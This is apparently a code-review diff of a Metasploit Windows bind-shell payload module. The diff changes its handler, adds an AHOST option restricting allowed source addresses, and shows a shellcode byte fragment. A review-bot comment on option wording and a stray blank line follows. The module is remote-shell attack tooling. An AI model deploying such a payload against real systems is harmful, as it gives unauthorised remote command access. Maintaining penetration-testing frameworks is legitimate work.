-require 'msf/core/handler/bind_hidden_tcp'
+require 'msf/core/handler/bind_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
 
@@ -25,13 +25,13 @@ module Metasploit3
 [
 'vlad902', # original payload module (single_shell_bind_tcp)
 'sd', # original payload module (single_shell_bind_tcp)
- 'Borja Merino ' # Add Hidden ACL functionality
+ 'Borja Merino ' # Add Hidden ACL functionality
 ],
 'License' => MSF_LICENSE,
 'References' => ['URL', 'http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html'],
 'Platform' => 'win',
 'Arch' => ARCH_X86,
- 'Handler' => Msf::Handler::BindHiddenTcp,
+ 'Handler' => Msf::Handler::BindTcp,
 'Session' => Msf::Sessions::CommandShell,
 'Payload' =>
 {
@@ -69,6 +69,11 @@ module Metasploit3
 "\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"
 }
 ))
+
+ register_options([
+ OptAddress.new('AHOST', [true, "IP address allowed", nil])
+ ])
 end
 
 end
+
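Review bot: The new AHOST option's description `"IP address allowed"` does not say what the address is allowed to do; given that the shellcode's condition function rejects every other source, suggest `OptAddress.new('AHOST', [true, 'Source address the listener accepts; connections from any other address are rejected', nil])`, which also matches the single-quoted style of the surrounding strings. Now that the generic BindTcp handler is used, that presumably has to be the address the handler itself connects from, otherwise its connect loop only ever sees the rejection; a sentence to that effect belongs in the module Description, which is outside this hunk and still contains "comming". The last added line is an empty line after the closing `end`, i.e. a stray blank line at end of file that should be dropped.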